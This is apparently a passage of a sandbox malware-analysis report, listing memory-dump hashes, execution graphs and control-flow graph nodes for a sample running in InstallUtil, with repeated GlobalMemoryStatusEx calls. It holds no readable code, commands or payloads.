                                                              • Opcode ID: 3d6f7eda333a85f3575b9c815eb9fc30640c7c703f76a561f261a2b93e33926a
                                                              • Instruction ID: 9bef66953d7709f612cdd4065e2edbba2ddba4b7267f7828f5321ab4d4401455
                                                              • Opcode Fuzzy Hash: 3d6f7eda333a85f3575b9c815eb9fc30640c7c703f76a561f261a2b93e33926a
                                                              • Instruction Fuzzy Hash: B521C0B5D14218DFDB14CFA9D980AEEFBF4BB49320F14A01AE815B7210C775A941CFA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8f74c072c9cd42b380710aaacf88fa383f2ad50c7a0ae926a105e38ac40ca17a
                                                              • Instruction ID: 3707fdf271c7b67c99e42f01e3214e2f96c14b650020405cbcd0eafece7287c9
                                                              • Opcode Fuzzy Hash: 8f74c072c9cd42b380710aaacf88fa383f2ad50c7a0ae926a105e38ac40ca17a
                                                              • Instruction Fuzzy Hash: 883199B1D116188BEB68CF6BC94978EFAF7AFC8304F14C1AEC50CA6255EB7449858F41

                                                              Execution Graph

                                                              Execution Coverage:10.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:19
                                                              Total number of Limit Nodes:4
                                                              execution_graph 26113 e20a03 26115 e2084e 26113->26115 26114 e2091b 26115->26114 26117 e21340 26115->26117 26119 e21356 26117->26119 26118 e21448 26118->26115 26119->26118 26121 e27059 26119->26121 26122 e27063 26121->26122 26123 e27119 26122->26123 26126 613ce78 26122->26126 26131 613ce88 26122->26131 26123->26119 26127 613ce9d 26126->26127 26128 613d0b2 26127->26128 26129 613d730 GlobalMemoryStatusEx 26127->26129 26130 613d4d0 GlobalMemoryStatusEx 26127->26130 26128->26123 26129->26127 26130->26127 26132 613ce9d 26131->26132 26133 613d0b2 26132->26133 26134 613d730 GlobalMemoryStatusEx 26132->26134 26135 613d4d0 GlobalMemoryStatusEx 26132->26135 26133->26123 26134->26132 26135->26132
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d0a2d070eebb74b77877f3f44aa95bf82c2c370362e556528ec05f7f889026ad
                                                              • Instruction ID: 77c62a3b34a09e087d05a94f4b18971491a892337ccae20b60b5d4233d5e4a93
                                                              • Opcode Fuzzy Hash: d0a2d070eebb74b77877f3f44aa95bf82c2c370362e556528ec05f7f889026ad
                                                              • Instruction Fuzzy Hash: E853E731D10B1A8ADB11EF68C8846A9F7B1FF99300F55D79AE45877121EB70AAC4CF81
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 940d3220742173691f029e4eb35392096236596f46a9a3402580aa7819d9a259
                                                              • Instruction ID: fc94c5a67aa237304297ba3a04374d6d736d4db89b5217280eb254f5524db40a
                                                              • Opcode Fuzzy Hash: 940d3220742173691f029e4eb35392096236596f46a9a3402580aa7819d9a259
                                                              • Instruction Fuzzy Hash: B4331C31D107198ADB11EF68C8846ADF7B1FF99300F15D79AE458B7221EB70AAC5CB81

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 3822 e24a60-e24ac6 3824 e24b10-e24b12 3822->3824 3825 e24ac8-e24ad3 3822->3825 3827 e24b14-e24b2d 3824->3827 3825->3824 3826 e24ad5-e24ae1 3825->3826 3828 e24ae3-e24aed 3826->3828 3829 e24b04-e24b0e 3826->3829 3834 e24b79-e24b7b 3827->3834 3835 e24b2f-e24b3b 3827->3835 3830 e24af1-e24b00 3828->3830 3831 e24aef 3828->3831 3829->3827 3830->3830 3833 e24b02 3830->3833 3831->3830 3833->3829 3837 e24b7d-e24b95 3834->3837 3835->3834 3836 e24b3d-e24b49 3835->3836 3838 e24b4b-e24b55 3836->3838 3839 e24b6c-e24b77 3836->3839 3844 e24b97-e24ba2 3837->3844 3845 e24bdf-e24be1 3837->3845 3840 e24b57 3838->3840 3841 e24b59-e24b68 3838->3841 3839->3837 3840->3841 3841->3841 3843 e24b6a 3841->3843 3843->3839 3844->3845 3847 e24ba4-e24bb0 3844->3847 3846 e24be3-e24bfb 3845->3846 3853 e24c45-e24c47 3846->3853 3854 e24bfd-e24c08 3846->3854 3848 e24bb2-e24bbc 3847->3848 3849 e24bd3-e24bdd 3847->3849 3851 e24bc0-e24bcf 3848->3851 3852 e24bbe 3848->3852 3849->3846 3851->3851 3855 e24bd1 3851->3855 3852->3851 3857 e24c49-e24cbc 3853->3857 3854->3853 3856 e24c0a-e24c16 3854->3856 3855->3849 3858 e24c18-e24c22 3856->3858 3859 e24c39-e24c43 3856->3859 3866 e24cc2-e24cd0 3857->3866 3860 e24c26-e24c35 3858->3860 3861 e24c24 3858->3861 3859->3857 3860->3860 3863 e24c37 3860->3863 3861->3860 3863->3859 3867 e24cd2-e24cd8 3866->3867 3868 e24cd9-e24d39 3866->3868 3867->3868 3875 e24d3b-e24d3f 3868->3875 3876 e24d49-e24d4d 3868->3876 3875->3876 3877 e24d41 3875->3877 3878 e24d4f-e24d53 3876->3878 3879 e24d5d-e24d61 3876->3879 3877->3876 3878->3879 3880 e24d55 3878->3880 3881 e24d63-e24d67 3879->3881 3882 e24d71-e24d75 3879->3882 3880->3879 3881->3882 3883 e24d69 3881->3883 3884 e24d77-e24d7b 3882->3884 3885 e24d85-e24d89 3882->3885 3883->3882 3884->3885 3886 e24d7d 3884->3886 3887 e24d8b-e24d8f 3885->3887 3888 e24d99-e24d9d 3885->3888 3886->3885 3887->3888 3889 e24d91-e24d94 call e20ab0 3887->3889 3890 e24d9f-e24da3 3888->3890 3891 e24dad 3888->3891 3889->3888 3890->3891 3893 e24da5-e24da8 call e20ab0 3890->3893 3895 e24dae 3891->3895 3893->3891 3895->3895
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fb530ccb0b3407ef8e71391fc2b631f2f3b11214ade486809a6ea99f757d5ebb
                                                              • Instruction ID: 5e7c9d605b1b9996e1ea517e4c0235beacdde1ea3ead4e82675b4209a1137d5f
                                                              • Opcode Fuzzy Hash: fb530ccb0b3407ef8e71391fc2b631f2f3b11214ade486809a6ea99f757d5ebb
                                                              • Instruction Fuzzy Hash: DDB16BB0E00229CFDB14CFA9E8917ADBBF2BF88714F149529D415B7294EB749841CB81

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 3971 e23e48-e23eae 3973 e23eb0-e23ebb 3971->3973 3974 e23ef8-e23efa 3971->3974 3973->3974 3975 e23ebd-e23ec9 3973->3975 3976 e23efc-e23f54 3974->3976 3977 e23ecb-e23ed5 3975->3977 3978 e23eec-e23ef6 3975->3978 3985 e23f56-e23f61 3976->3985 3986 e23f9e-e23fa0 3976->3986 3979 e23ed7 3977->3979 3980 e23ed9-e23ee8 3977->3980 3978->3976 3979->3980 3980->3980 3982 e23eea 3980->3982 3982->3978 3985->3986 3987 e23f63-e23f6f 3985->3987 3988 e23fa2-e23fba 3986->3988 3989 e23f92-e23f9c 3987->3989 3990 e23f71-e23f7b 3987->3990 3995 e24004-e24006 3988->3995 3996 e23fbc-e23fc7 3988->3996 3989->3988 3991 e23f7f-e23f8e 3990->3991 3992 e23f7d 3990->3992 3991->3991 3994 e23f90 3991->3994 3992->3991 3994->3989 3997 e24008-e24056 3995->3997 3996->3995 3998 e23fc9-e23fd5 3996->3998 4006 e2405c-e2406a 3997->4006 3999 e23fd7-e23fe1 3998->3999 4000 e23ff8-e24002 3998->4000 4002 e23fe3 3999->4002 4003 e23fe5-e23ff4 3999->4003 4000->3997 4002->4003 4003->4003 4004 e23ff6 4003->4004 4004->4000 4007 e24073-e240d3 4006->4007 4008 e2406c-e24072 4006->4008 4015 e240e3-e240e7 4007->4015 4016 e240d5-e240d9 4007->4016 4008->4007 4018 e240f7-e240fb 4015->4018 4019 e240e9-e240ed 4015->4019 4016->4015 4017 e240db 4016->4017 4017->4015 4021 e2410b-e2410f 4018->4021 4022 e240fd-e24101 4018->4022 4019->4018 4020 e240ef-e240f2 call e20ab0 4019->4020 4020->4018 4024 e24111-e24115 4021->4024 4025 e2411f-e24123 4021->4025 4022->4021 4023 e24103-e24106 call e20ab0 4022->4023 4023->4021 4024->4025 4028 e24117-e2411a call e20ab0 4024->4028 4029 e24133-e24137 4025->4029 4030 e24125-e24129 4025->4030 4028->4025 4033 e24147 4029->4033 4034 e24139-e2413d 4029->4034 4030->4029 4032 e2412b 4030->4032 4032->4029 4036 e24148 4033->4036 4034->4033 4035 e2413f 4034->4035 4035->4033 4036->4036
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf6b2b2c78cd52fa2d6ebdb1700d816446eda9adfd3c1aaf56e4bbb1bde04065
                                                              • Instruction ID: 7fff4eada0de08548893d8165b9dd268688ce3457d13bf351ed29620ddd3c024
                                                              • Opcode Fuzzy Hash: cf6b2b2c78cd52fa2d6ebdb1700d816446eda9adfd3c1aaf56e4bbb1bde04065
                                                              • Instruction Fuzzy Hash: 33915CB0E003199FDB10CFA9E985BDDBBF2AF88704F149129E415B7294EB749985CF81

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1123 613e09f-613e0ab 1124 613e0d5-613e0e8 1123->1124 1125 613e0ad-613e0d4 call 613d4c0 1123->1125 1129 613e0eb-613e0f4 call 613d808 1124->1129 1132 613e0f6-613e0f9 1129->1132 1133 613e0fa-613e138 1129->1133 1133->1129 1138 613e13a-613e159 1133->1138 1140 613e15b-613e15e 1138->1140 1141 613e15f-613e1ec GlobalMemoryStatusEx 1138->1141 1144 613e1f5-613e21d 1141->1144 1145 613e1ee-613e1f4 1141->1145 1145->1144
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2348953191.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6130000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c0f6436a2a1c3c01e2ef04d3c836da97dc38d07a56d52d52920ee0191301182e
                                                              • Instruction ID: 08b34474c63da200992ebad866ae7b7cb1d1b0f75eaf25e29dfb4e660bbd8d0b
                                                              • Opcode Fuzzy Hash: c0f6436a2a1c3c01e2ef04d3c836da97dc38d07a56d52d52920ee0191301182e
                                                              • Instruction Fuzzy Hash: DD411272E143568FCB14CFB9D8002AEBBF1AF89210F15866BE409E7241DB749885CBA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1148 613e178-613e1b6 1149 613e1be-613e1ec GlobalMemoryStatusEx 1148->1149 1150 613e1f5-613e21d 1149->1150 1151 613e1ee-613e1f4 1149->1151 1151->1150
                                                              APIs
                                                              • GlobalMemoryStatusEx.KERNELBASE(8B550519), ref: 0613E1DF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2348953191.0000000006130000.00000040.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_6130000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemoryStatus
                                                              • String ID:
                                                              • API String ID: 1890195054-0
                                                              • Opcode ID: 3c27e45f24832066052ad5bb748a81a2a4cf0e8a69d0b84868c5b77045933bba
                                                              • Instruction ID: 0db5f8c1da0d0a4c94637a24072a1a12daeee23f6d2b70924e35196e282a6687
                                                              • Opcode Fuzzy Hash: 3c27e45f24832066052ad5bb748a81a2a4cf0e8a69d0b84868c5b77045933bba
                                                              • Instruction Fuzzy Hash: D11114B1C0065A9BCB10CF9AC94479EFBF4AF48320F11816AE918A7240D778A954CFA5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2745 e27988-e2799f 2746 e279a1-e279a4 2745->2746 2747 e279d1-e279d4 2746->2747 2748 e279a6-e279cc 2746->2748 2749 e27a01-e27a04 2747->2749 2750 e279d6-e279fc 2747->2750 2748->2747 2751 e27a31-e27a34 2749->2751 2752 e27a06-e27a2c 2749->2752 2750->2749 2754 e27a61-e27a64 2751->2754 2755 e27a36-e27a5c 2751->2755 2752->2751 2757 e27a91-e27a94 2754->2757 2758 e27a66-e27a8c 2754->2758 2755->2754 2762 e27ac1-e27ac4 2757->2762 2763 e27a96-e27abc 2757->2763 2758->2757 2765 e27af1-e27af4 2762->2765 2766 e27ac6-e27aec 2762->2766 2763->2762 2772 e27b21-e27b24 2765->2772 2773 e27af6-e27b1c 2765->2773 2766->2765 2775 e27b51-e27b54 2772->2775 2776 e27b26-e27b4c 2772->2776 2773->2772 2782 e27b81-e27b84 2775->2782 2783 e27b56-e27b7c 2775->2783 2776->2775 2785 e27b91-e27b94 2782->2785 2786 e27b86 2782->2786 2783->2782 2792 e27bc1-e27bc4 2785->2792 2793 e27b96-e27bbc 2785->2793 2797 e27b8c 2786->2797 2795 e27bf1-e27bf4 2792->2795 2796 e27bc6-e27bec 2792->2796 2793->2792 2802 e27c21-e27c24 2795->2802 2803 e27bf6-e27c1c 2795->2803 2796->2795 2797->2785 2805 e27c51-e27c54 2802->2805 2806 e27c26-e27c4c 2802->2806 2803->2802 2810 e27c81-e27c84 2805->2810 2811 e27c56-e27c7c 2805->2811 2806->2805 2814 e27cb1-e27cb4 2810->2814 2815 e27c86-e27cac 2810->2815 2811->2810 2818 e27ce1-e27ce4 2814->2818 2819 e27cb6-e27cdc 2814->2819 2815->2814 2823 e27d11-e27d14 2818->2823 2824 e27ce6-e27d0c 2818->2824 2819->2818 2828 e27d41-e27d44 2823->2828 2829 e27d16-e27d3c 2823->2829 2824->2823 2833 e27d71-e27d74 2828->2833 2834 e27d46-e27d6c 2828->2834 2829->2828 2838 e27da1-e27da4 2833->2838 2839 e27d76-e27d9c 2833->2839 2834->2833 2843 e27dd1-e27dd4 2838->2843 2844 e27da6-e27dcc 2838->2844 2839->2838 2848 e27e01-e27e04 2843->2848 2849 e27dd6-e27dfc 2843->2849 2844->2843 2853 e27e31-e27e34 2848->2853 2854 e27e06-e27e2c 2848->2854 2849->2848 2858 e27e61-e27e64 2853->2858 2859 e27e36-e27e5c 2853->2859 2854->2853 2863 e27e91-e27e94 2858->2863 2864 e27e66-e27e8c 2858->2864 2859->2858 2868 e27eb1-e27eb4 2863->2868 2869 e27e96-e27eac 2863->2869 2864->2863 2876 e27ee1-e27ee4 2868->2876 2877 e27eb6-e27edc 2868->2877 2869->2868 2878 e27f11-e27f14 2876->2878 2879 e27ee6-e27f0c 2876->2879 2877->2876 2886 e27f41-e27f44 2878->2886 2887 e27f16-e27f3c 2878->2887 2879->2878 2888 e27f46-e27f48 2886->2888 2889 e27f55-e27f58 2886->2889 2887->2886 2959 e27f4a call e29283 2888->2959 2960 e27f4a call e291e0 2888->2960 2961 e27f4a call e291d1 2888->2961 2896 e27f85-e27f88 2889->2896 2897 e27f5a-e27f80 2889->2897 2898 e27fb5-e27fb8 2896->2898 2899 e27f8a-e27fb0 2896->2899 2897->2896 2904 e27fe5-e27fe8 2898->2904 2905 e27fba-e27fe0 2898->2905 2899->2898 2900 e27f50 2900->2889 2907 e28015-e28018 2904->2907 2908 e27fea-e28010 2904->2908 2905->2904 2912 e28045-e28048 2907->2912 2913 e2801a-e28040 2907->2913 2908->2907 2916 e28075-e28078 2912->2916 2917 e2804a-e28070 2912->2917 2913->2912 2921 e28093-e28096 2916->2921 2922 e2807a-e2808e 2916->2922 2917->2916 2925 e280c3-e280c6 2921->2925 2926 e28098-e280be 2921->2926 2922->2921 2931 e280f3-e280f6 2925->2931 2932 e280c8-e280ee 2925->2932 2926->2925 2935 e28123-e28126 2931->2935 2936 e280f8-e2811e 2931->2936 2932->2931 2941 e28153-e28155 2935->2941 2942 e28128-e2814e 2935->2942 2936->2935 2945 e28157 2941->2945 2946 e2815c-e2815f 2941->2946 2942->2941 2945->2946 2946->2746 2950 e28165-e2816b 2946->2950 2959->2900 2960->2900 2961->2900
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 39c2322d389a2bab75037aaea1453293b5b5aaf62f265806a4c6dd62b3ccb515
                                                              • Instruction ID: 1039b27fbed1f1705389a8a021285814b4027543273b2599fb4a4bb41fe7f4c2
                                                              • Opcode Fuzzy Hash: 39c2322d389a2bab75037aaea1453293b5b5aaf62f265806a4c6dd62b3ccb515
                                                              • Instruction Fuzzy Hash: EA126F307011128FDF2AAB3CFA4462C76A2FBC9308B509A2DE505DB399CF75ED469791
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 70a68d74309da1a9e34b18df3a98faa872d98dee90d485c8a1f41d951dd35669
                                                              • Instruction ID: edaf4045b1876b91ffd76c99c04748fa6b8efb92ba68e94f63882bb63a72aad0
                                                              • Opcode Fuzzy Hash: 70a68d74309da1a9e34b18df3a98faa872d98dee90d485c8a1f41d951dd35669
                                                              • Instruction Fuzzy Hash: 68D17134B002158FDB14DF68E584AADBBB2FF89314F14A569E806E7396DB34DD82CB50

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 3615 e29760-e2977a 3616 e2977c-e2977f 3615->3616 3617 e29781-e29784 3616->3617 3618 e29789-e2978c 3616->3618 3617->3618 3619 e29796-e29799 3618->3619 3620 e2978e-e29793 3618->3620 3621 e2979b-e297b3 3619->3621 3622 e297b8-e297bb 3619->3622 3620->3619 3621->3622 3623 e297e5-e297ee 3622->3623 3624 e297bd-e297c0 3622->3624 3628 e297f0 3623->3628 3629 e2984e-e29857 3623->3629 3626 e297c2-e297db 3624->3626 3627 e297e0-e297e3 3624->3627 3626->3627 3627->3623 3630 e297f5-e297f8 3627->3630 3628->3630 3631 e298f9-e29973 3629->3631 3632 e2985d-e29861 3629->3632 3633 e298ee-e298f8 3630->3633 3634 e297fe-e29801 3630->3634 3672 e29a8a-e29a91 3631->3672 3673 e29979-e2997b 3631->3673 3637 e29866-e29869 3632->3637 3640 e29822-e29825 3634->3640 3641 e29803-e2981b 3634->3641 3638 e2986b-e29887 3637->3638 3639 e29888-e2988b 3637->3639 3643 e2989d-e298a0 3639->3643 3644 e2988d 3639->3644 3645 e29827-e29835 3640->3645 3646 e2983c-e2983f 3640->3646 3653 e29841-e29844 3641->3653 3656 e2981d 3641->3656 3650 e298a2-e298ba 3643->3650 3651 e298bf-e298c2 3643->3651 3655 e29895-e29898 3644->3655 3645->3638 3664 e29837 3645->3664 3646->3653 3654 e29849-e2984c 3646->3654 3650->3651 3658 e298c4-e298d7 3651->3658 3659 e298dc-e298de 3651->3659 3653->3654 3654->3629 3654->3637 3655->3643 3656->3640 3658->3659 3660 e298e0 3659->3660 3661 e298e5-e298e8 3659->3661 3660->3661 3661->3616 3661->3633 3664->3646 3717 e2997e call e29510 3673->3717 3718 e2997e call e29760 3673->3718 3719 e2997e call e293e4 3673->3719 3720 e2997e call e2970e 3673->3720 3674 e29984-e29990 3676 e29992-e29999 3674->3676 3677 e2999b-e299a2 3674->3677 3676->3677 3678 e299a3-e299ca 3676->3678 3682 e299d4-e299db 3678->3682 3683 e299cc-e299d3 3678->3683 3684 e29a92-e29a98 3682->3684 3685 e299e1-e299e5 3682->3685 3689 e29a9a-e29ac3 3684->3689 3690 e29a5b-e29a6e 3684->3690 3686 e299e7-e299ee 3685->3686 3687 e299ef-e29a58 3685->3687 3687->3690 3692 e29ac5-e29ac7 3689->3692 3698 e29a70-e29a77 3690->3698 3699 e29a7e-e29a84 call e29c63 3690->3699 3693 e29ac9 3692->3693 3694 e29ace-e29ad1 3692->3694 3693->3694 3694->3692 3697 e29ad3-e29b0f call e20368 3694->3697 3704 e29b11-e29b13 3697->3704 3705 e29b17-e29b1a 3697->3705 3698->3699 3699->3672 3706 e29b61 3704->3706 3707 e29b15 3704->3707 3705->3706 3708 e29b1c-e29b46 3705->3708 3710 e29b66-e29b6a 3706->3710 3707->3708 3715 e29b4c-e29b5f 3708->3715 3711 e29b75 3710->3711 3712 e29b6c 3710->3712 3712->3711 3715->3710 3717->3674 3718->3674 3719->3674 3720->3674
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ff5507b3b83247b3fa4c778800df6636201193ff9505847a9abaeb03325e21dd
                                                              • Instruction ID: 9cf77902df73a0f5d757dcb33c5a10ead011e2c34a52c38d90694f3de2e96cae
                                                              • Opcode Fuzzy Hash: ff5507b3b83247b3fa4c778800df6636201193ff9505847a9abaeb03325e21dd
                                                              • Instruction Fuzzy Hash: 80C1A070B002158FDB14DF68E8807AEB7B2FB89314F14A56AE509EB396DB74DD41CB90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 3896 e24a54-e24ac6 3899 e24b10-e24b12 3896->3899 3900 e24ac8-e24ad3 3896->3900 3902 e24b14-e24b2d 3899->3902 3900->3899 3901 e24ad5-e24ae1 3900->3901 3903 e24ae3-e24aed 3901->3903 3904 e24b04-e24b0e 3901->3904 3909 e24b79-e24b7b 3902->3909 3910 e24b2f-e24b3b 3902->3910 3905 e24af1-e24b00 3903->3905 3906 e24aef 3903->3906 3904->3902 3905->3905 3908 e24b02 3905->3908 3906->3905 3908->3904 3912 e24b7d-e24b95 3909->3912 3910->3909 3911 e24b3d-e24b49 3910->3911 3913 e24b4b-e24b55 3911->3913 3914 e24b6c-e24b77 3911->3914 3919 e24b97-e24ba2 3912->3919 3920 e24bdf-e24be1 3912->3920 3915 e24b57 3913->3915 3916 e24b59-e24b68 3913->3916 3914->3912 3915->3916 3916->3916 3918 e24b6a 3916->3918 3918->3914 3919->3920 3922 e24ba4-e24bb0 3919->3922 3921 e24be3-e24bfb 3920->3921 3928 e24c45-e24c47 3921->3928 3929 e24bfd-e24c08 3921->3929 3923 e24bb2-e24bbc 3922->3923 3924 e24bd3-e24bdd 3922->3924 3926 e24bc0-e24bcf 3923->3926 3927 e24bbe 3923->3927 3924->3921 3926->3926 3930 e24bd1 3926->3930 3927->3926 3932 e24c49-e24c7f 3928->3932 3929->3928 3931 e24c0a-e24c16 3929->3931 3930->3924 3933 e24c18-e24c22 3931->3933 3934 e24c39-e24c43 3931->3934 3940 e24c87-e24cbc 3932->3940 3935 e24c26-e24c35 3933->3935 3936 e24c24 3933->3936 3934->3932 3935->3935 3938 e24c37 3935->3938 3936->3935 3938->3934 3941 e24cc2-e24cd0 3940->3941 3942 e24cd2-e24cd8 3941->3942 3943 e24cd9-e24d39 3941->3943 3942->3943 3950 e24d3b-e24d3f 3943->3950 3951 e24d49-e24d4d 3943->3951 3950->3951 3952 e24d41 3950->3952 3953 e24d4f-e24d53 3951->3953 3954 e24d5d-e24d61 3951->3954 3952->3951 3953->3954 3955 e24d55 3953->3955 3956 e24d63-e24d67 3954->3956 3957 e24d71-e24d75 3954->3957 3955->3954 3956->3957 3958 e24d69 3956->3958 3959 e24d77-e24d7b 3957->3959 3960 e24d85-e24d89 3957->3960 3958->3957 3959->3960 3961 e24d7d 3959->3961 3962 e24d8b-e24d8f 3960->3962 3963 e24d99-e24d9d 3960->3963 3961->3960 3962->3963 3964 e24d91-e24d94 call e20ab0 3962->3964 3965 e24d9f-e24da3 3963->3965 3966 e24dad 3963->3966 3964->3963 3965->3966 3968 e24da5-e24da8 call e20ab0 3965->3968 3970 e24dae 3966->3970 3968->3966 3970->3970
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9c648f3c8986f39f9e787474e4ee4321e0bb0ba43c21818ca40b339f1f4b3529
                                                              • Instruction ID: 62353f7d64062c75a8466c22882179d854f653fdcf108b9578770962242bbf90
                                                              • Opcode Fuzzy Hash: 9c648f3c8986f39f9e787474e4ee4321e0bb0ba43c21818ca40b339f1f4b3529
                                                              • Instruction Fuzzy Hash: B4B16CB0E00229CFDB10CFA9E9857DDBBF2BF88714F149529D415B7294EB749845CB81
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7138ec72d9a5e2d39d8fe60907b5195696aa4a7812c40fc28ed6575ac6b35c2c
                                                              • Instruction ID: cc02c04d767327eda5f0de5c540c532c93a7dd13aa00a6dc9bda618c152218bd
                                                              • Opcode Fuzzy Hash: 7138ec72d9a5e2d39d8fe60907b5195696aa4a7812c40fc28ed6575ac6b35c2c
                                                              • Instruction Fuzzy Hash: FC916CB0E002199FDB10CFA9E985BDDBBF2BF88704F249129E415B7294DB749985CF81
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4fe3e5617176ccf70114ab9b9e231d0c0c33f327247f86a5f6d4b9e891c22a2a
                                                              • Instruction ID: 8a51ff86be9f24864f1dd368f5d45af1d9d1484adc5b086ac2b36a55736f47dc
                                                              • Opcode Fuzzy Hash: 4fe3e5617176ccf70114ab9b9e231d0c0c33f327247f86a5f6d4b9e891c22a2a
                                                              • Instruction Fuzzy Hash: 7F513731700664CFDB14EB74EA54AAD77F2FF89309B2014A8D406EB3A5DB769E41CB90
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fe21e9fe764315b3a250f43bd46af817183aab945b3322c5236f08c919f180e8
                                                              • Instruction ID: aa6c65c9feca4decc81b73c50c9fdccf8028fc3c1ea3a7c09a7bee8fc374ec9d
                                                              • Opcode Fuzzy Hash: fe21e9fe764315b3a250f43bd46af817183aab945b3322c5236f08c919f180e8
                                                              • Instruction Fuzzy Hash: 13515474E002288FDB14CFA9E884B9DBBB1FF48314F15961AE815BB390D7B4A844CF94
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2323888690.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_e20000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4dacb94b2ee8af9ba85bc67cd9590d4110d9e352c9053c7a49db7fc629ac6714
                                                              • Instruction ID: 576b896fea4c801f36901fca6d03e9ede7e21dc8e994556a679f380aa6e3c6d7
